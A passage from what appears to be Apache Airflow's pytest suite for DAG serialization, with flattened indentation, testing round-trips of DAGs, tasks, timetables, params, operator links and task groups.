assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
assert isinstance(dag, DAG)
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags(
[
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
)
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
@pytest.mark.parametrize(
"timetable",
[cron_timetable("0 0 * * *"), CustomSerializationTimetable("foo")],
)
@pytest.mark.usefixtures("timetable_plugin")
def test_dag_roundtrip_from_timetable(self, timetable):
"""Verify a timetable-backed serialization can be deserialized."""
dag = get_timetable_based_simple_dag(timetable)
roundtripped = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(roundtripped, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually.
'timetable',
'timezone',
# Need to check fields in it, to exclude functions.
'default_args',
"_task_group",
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(
dag, field
), f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert (
v == serialized_dag.default_args[k]
), f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timetable.summary == dag.timetable.summary
assert serialized_dag.timetable.serialize() == dag.timetable.serialize()
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
def validate_deserialized_task(
self,
serialized_task,
task,
):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type',
'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_ext',
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback',
'on_success_callback',
'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_ext) == set(task.template_ext)
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(
task, field
), f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@pytest.mark.parametrize(
"dag_start_date, task_start_date, expected_task_start_date",
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(pendulum.datetime(2019, 8, 1, tz='UTC'), None, pendulum.datetime(2019, 8, 1, tz='UTC')),
],
)
def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
assert "start_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "start_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.start_date == expected_task_start_date
def test_deserialization_with_dag_context(self):
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag:
BaseOperator(task_id='simple_task')
# should not raise RuntimeError: dictionary changed size during iteration
SerializedDAG.to_dict(dag)
@pytest.mark.parametrize(
"dag_end_date, task_end_date, expected_task_end_date",
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
),
],
)
def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
assert "end_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "end_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.end_date == expected_task_end_date
@pytest.mark.parametrize(
"serialized_timetable, expected_timetable",
[
({"__type": "airflow.timetables.simple.NullTimetable", "__var": {}}, NullTimetable()),
(
{
"__type": "airflow.timetables.interval.CronDataIntervalTimetable",
"__var": {"expression": "@weekly", "timezone": "UTC"},
},
cron_timetable("0 0 * * 0"),
),
({"__type": "airflow.timetables.simple.OnceTimetable", "__var": {}}, OnceTimetable()),
(
{
"__type": "airflow.timetables.interval.DeltaDataIntervalTimetable",
"__var": {"delta": 86400.0},
},
delta_timetable(timedelta(days=1)),
),
(CUSTOM_TIMETABLE_SERIALIZED, CustomSerializationTimetable("foo")),
],
)
@pytest.mark.usefixtures("timetable_plugin")
def test_deserialization_timetable(
self,
serialized_timetable,
expected_timetable,
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"timetable": serialized_timetable,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert dag.timetable == expected_timetable
def test_deserialization_timetable_unregistered(self):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"timetable": CUSTOM_TIMETABLE_SERIALIZED,
},
}
SerializedDAG.validate_schema(serialized)
with pytest.raises(ValueError) as ctx:
SerializedDAG.from_dict(serialized)
message = (
"Timetable class "
"'tests.test_utils.timetables.CustomSerializationTimetable' "
"is not registered"
)
assert str(ctx.value) == message
@pytest.mark.parametrize(
"serialized_schedule_interval, expected_timetable",
[
(None, NullTimetable()),
("@weekly", cron_timetable("0 0 * * 0")),
("@once", OnceTimetable()),
(
{"__type": "timedelta", "__var": 86400.0},
delta_timetable(timedelta(days=1)),
),
],
)
def test_deserialization_schedule_interval(
self,
serialized_schedule_interval,
expected_timetable,
):
"""Test DAGs serialized before 2.2 can be correctly deserialized."""
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert dag.timetable == expected_timetable
@pytest.mark.parametrize(
"val, expected",
[
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}),
],
)
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
assert serialized == expected
round_tripped = SerializedDAG._deserialize(serialized)
assert val == round_tripped
@pytest.mark.parametrize(
"val, expected_val",
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
],
)
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
assert "params" in serialized_dag["dag"]
else:
assert "params" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_dag.params
assert expected_val == deserialized_simple_task.params
@pytest.mark.parametrize(
"val, expected_val",
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
],
)
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
assert "params" in serialized_dag["dag"]["tasks"][0]
else:
assert "params" not in serialized_dag["dag"]["tasks"][0]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_simple_task.params
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = timezone.DateTime(2019, 8, 1, tzinfo=timezone.utc)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == "true"
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomOpLink': {}}
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {'Google Custom', 'airflow', 'github', 'google'}
XCom.set(
key='search_query',
value="dummy_value_1",
task_id=simple_task.task_id,
dag_id=simple_task.dag_id,
execution_date=test_date,
)
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
assert 'http://google.com/custom_base_link?search=dummy_value_1' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
def test_extra_operator_links_logs_error_for_non_registered_extra_links(self, caplog):
"""
Assert OperatorLinks not registered via Plugins and if it is not an inbuilt Operator Link,
it can still deserialize the DAG (does not error) but just logs an error
"""
class TaskStateLink(BaseOperatorLink):
"""OperatorLink not registered via Plugins nor a built-in OperatorLink"""
name = 'My Link'
def get_link(self, operator, dttm):
return 'https://www.google.com'
class MyOperator(BaseOperator):
"""Just a DummyOperator using above defined Extra Operator Link"""
operator_extra_links = [TaskStateLink()]
def execute(self, context):
pass
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag:
MyOperator(task_id='blah')
serialized_dag = SerializedDAG.to_dict(dag)
with caplog.at_level("ERROR", logger="airflow.serialization.serialized_objects"):
SerializedDAG.from_dict(serialized_dag)
expected_err_msg = (
"Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' not registered"
)
assert expected_err_msg in caplog.text
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = timezone.DateTime(2019, 8, 1, tzinfo=timezone.utc)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == ["echo", "true"]
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {
'BigQuery Console #1',
'BigQuery Console #2',
'airflow',
'github',
'google',
}
XCom.set(
key='search_query',
value=["dummy_value_1", "dummy_value_2"],
task_id=simple_task.task_id,
dag_id=simple_task.dag_id,
execution_date=test_date,
)
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_1' == custom_inbuilt_link
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_2' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
class ClassWithCustomAttributes:
"""
Class for testing purpose: allows to create objects with custom attributes in one single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return f"{self.__class__.__name__}({str(self.__dict__)})"
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@pytest.mark.parametrize(
"templated_field, expected_field",
[
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(
nested1=ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
nested2=ClassWithCustomAttributes(
att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"]
),
template_fields=["nested1"],
),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': "
"'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
],
)
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
Since we don't want to inflate arbitrary python objects (it poses a RCE/security risk etc.)
we want check that non-"basic" objects are turned in to strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
assert expected_field == getattr(deserialized_test_task, "bash_command")
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization needs to be ignored
ignored_keys: set = {
"is_subdag",
"tasks",
"has_on_success_callback",
"has_on_failure_callback",
"dag_dependencies",
}
keys_for_backwards_compat: set = {
"_concurrency",
}
dag_params: set = set(dag_schema.keys()) - ignored_keys - keys_for_backwards_compat
assert set(DAG.get_serialized_fields()) == dag_params
def test_operator_subclass_changing_base_defaults(self):
assert (
BaseOperator(task_id='dummy').do_xcom_push is True
), "Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that there are no new fields added to BaseOperator. And reminds that
tests should be added for it.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
assert {
'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'_pre_execute_hook': None,
'_post_execute_hook': None,
'depends_on_past': False,
'do_xcom_push': True,
'doc': None,
'doc_json': None,
'doc_md': None,
'doc_rst': None,
'doc_yaml': None,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_active_tis_per_dag': None,
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream',
} == fields, """
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
def test_deps_sorted(self):
"""
Tests serialize_operator, make sure the deps is in order
"""
from airflow.operators.dummy import DummyOperator
from airflow.sensors.external_task import ExternalTaskSensor
execution_date = datetime(2020, 1, 1)
with DAG(dag_id="test_deps_sorted", start_date=execution_date) as dag:
task1 = ExternalTaskSensor(
task_id="task1",
external_dag_id="external_dag_id",
mode="reschedule",
)
task2 = DummyOperator(task_id="task2")
task1 >> task2
serialize_op = SerializedBaseOperator.serialize_operator(dag.task_dict["task1"])
deps = serialize_op["deps"]
assert deps == [
'airflow.ti_deps.deps.not_in_retry_period_dep.NotInRetryPeriodDep',
'airflow.ti_deps.deps.not_previously_skipped_dep.NotPreviouslySkippedDep',
'airflow.ti_deps.deps.prev_dagrun_dep.PrevDagrunDep',
'airflow.ti_deps.deps.ready_to_reschedule.ReadyToRescheduleDep',
'airflow.ti_deps.deps.trigger_rule_dep.TriggerRuleDep',
]
def test_task_group_sorted(self):
"""
Tests serialize_task_group, make sure the list is in order
"""
from airflow.operators.dummy import DummyOperator
from airflow.serialization.serialized_objects import SerializedTaskGroup
from airflow.utils.task_group import TaskGroup
"""
start
╱ ╲
╱ ╲
task_group_up1 task_group_up2
(task_up1) (task_up2)
╲ ╱
task_group_middle
(task_middle)
╱ ╲
task_group_down1 task_group_down2
(task_down1) (task_down2)
╲ ╱
╲ ╱
end
"""
execution_date = datetime(2020, 1, 1)
with DAG(dag_id="test_task_group_sorted", start_date=execution_date) as dag:
start = DummyOperator(task_id="start")
with TaskGroup("task_group_up1") as task_group_up1:
_ = DummyOperator(task_id="task_up1")
with TaskGroup("task_group_up2") as task_group_up2:
_ = DummyOperator(task_id="task_up2")
with TaskGroup("task_group_middle") as task_group_middle:
_ = DummyOperator(task_id="task_middle")
with TaskGroup("task_group_down1") as task_group_down1:
_ = DummyOperator(task_id="task_down1")
with TaskGroup("task_group_down2") as task_group_down2:
_ = DummyOperator(task_id="task_down2")
end = DummyOperator(task_id='end')
start >> task_group_up1
start >> task_group_up2
task_group_up1 >> task_group_middle
task_group_up2 >> task_group_middle
task_group_middle >> task_group_down1
task_group_middle >> task_group_down2
task_group_down1 >> end
task_group_down2 >> end
task_group_middle_dict = SerializedTaskGroup.serialize_task_group(
dag.task_group.children["task_group_middle"]
)
upstream_group_ids = task_group_middle_dict["upstream_group_ids"]
assert upstream_group_ids == ['task_group_up1', 'task_group_up2']
upstream_task_ids = task_group_middle_dict["upstream_task_ids"]
assert upstream_task_ids == ['task_group_up1.task_up1', 'task_group_up2.task_up2']
downstream_group_ids = task_group_middle_dict["downstream_group_ids"]
assert downstream_group_ids == ['task_group_down1', 'task_group_down2']
task_group_down1_dict = SerializedTaskGroup.serialize_task_group(
dag.task_group.children["task_group_down1"]
)
downstream_task_ids = task_group_down1_dict["downstream_task_ids"]
assert downstream_task_ids == ['end']
def test_edge_info_serialization(self):
"""
Tests edge_info serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.edgemodifier import Label
with DAG("test_edge_info_serialization", start_date=datetime(2020, 1, 1)) as dag:
task1 = DummyOperator(task_id="task1")
task2 = DummyOperator(task_id="task2")
task1 >> Label("test label") >> task2
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.edge_info == dag.edge_info
@pytest.mark.parametrize(
"mode, expect_custom_deps",
[
("poke", False),
("reschedule", True),
],
)
def test_serialize_sensor(self, mode, expect_custom_deps):
from airflow.sensors.base import BaseSensorOperator
class DummySensor(BaseSensorOperator):
def poke(self, context):
return False
op = DummySensor(task_id='dummy', mode=mode, poke_interval=23)
blob = SerializedBaseOperator.serialize_operator(op)
if expect_custom_deps:
assert "deps" in blob
else:
assert "deps" not in blob
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert op.deps == serialized_op.deps
@pytest.mark.parametrize(
"passed_success_callback, expected_value",
[
({"on_success_callback": lambda x: print("hi")}, True),
({}, False),
],
)
def test_dag_on_success_callback_roundtrip(self, passed_success_callback, expected_value):
"""
Test that when on_success_callback is passed to the DAG, has_on_success_callback is stored
in Serialized JSON blob. And when it is de-serialized dag.has_on_success_callback is set to True.
When the callback is not set, has_on_success_callback should not be stored in Serialized blob
and so default to False on de-serialization
"""
dag = DAG(dag_id='test_dag_on_success_callback_roundtrip', **passed_success_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_success_callback" in serialized_dag["dag"]
else:
assert "has_on_success_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_success_callback is expected_value
@pytest.mark.parametrize(
"passed_failure_callback, expected_value",
[
({"on_failure_callback": lambda x: print("hi")}, True),
({}, False),
],
)
def test_dag_on_failure_callback_roundtrip(self, passed_failure_callback, expected_value):
"""
Test that when on_failure_callback is passed to the DAG, has_on_failure_callback is stored
in Serialized JSON blob. And when it is de-serialized dag.has_on_failure_callback is set to True.
When the callback is not set, has_on_failure_callback should not be stored in Serialized blob
and so default to False on de-serialization
"""
dag = DAG(dag_id='test_dag_on_failure_callback_roundtrip', **passed_failure_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_failure_callback" in serialized_dag["dag"]
else:
assert "has_on_failure_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_failure_callback is expected_value
@pytest.mark.parametrize(
"object_to_serialized, expected_output",
[
(
['task_1', 'task_5', 'task_2', 'task_4'],
['task_1', 'task_5', 'task_2', 'task_4'],
),
(
{'task_1', 'task_5', 'task_2', 'task_4'},
['task_1', 'task_2', 'task_4', 'task_5'],
),
(
('task_1', 'task_5', 'task_2', 'task_4'),
['task_1', 'task_5', 'task_2', 'task_4'],
),
(
{
"staging_schema": [
{"key:": "foo", "value": "bar"},
{"key:": "this", "value": "that"},
"test_conf",
]
},
{
"staging_schema": [
{"__type": "dict", "__var": {"key:": "foo", "value": "bar"}},
{
"__type": "dict",
"__var": {"key:": "this", "value": "that"},
},
"test_conf",
]
},
),
(
{"task3": "test3", "task2": "test2", "task1": "test1"},
{"task1": "test1", "task2": "test2", "task3": "test3"},
),
(
('task_1', 'task_5', 'task_2', 3, ["x", "y"]),
['task_1', 'task_5', 'task_2', 3, ["x", "y"]],
),
],
)
def test_serialized_objects_are_sorted(self, object_to_serialized, expected_output):
"""Test Serialized Sets are sorted while list and tuple preserve order"""
serialized_obj = SerializedDAG._serialize(object_to_serialized)
if isinstance(serialized_obj, dict) and "__type" in serialized_obj:
serialized_obj = serialized_obj["__var"]
assert serialized_obj == expected_output
def test_kubernetes_optional():
"""Serialisation / deserialisation continues to work without kubernetes installed"""
def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
if level == 0 and name.partition('.')[0] == 'kubernetes':
raise ImportError("No module named 'kubernetes'")
return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)
with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
# load module from scratch, this does not replace any already imported
# airflow.serialization.serialized_objects module in sys.modules
spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
# if we got this far, the module did not try to load kubernetes, but
# did it try to access airflow.kubernetes.*?
imported_airflow = {
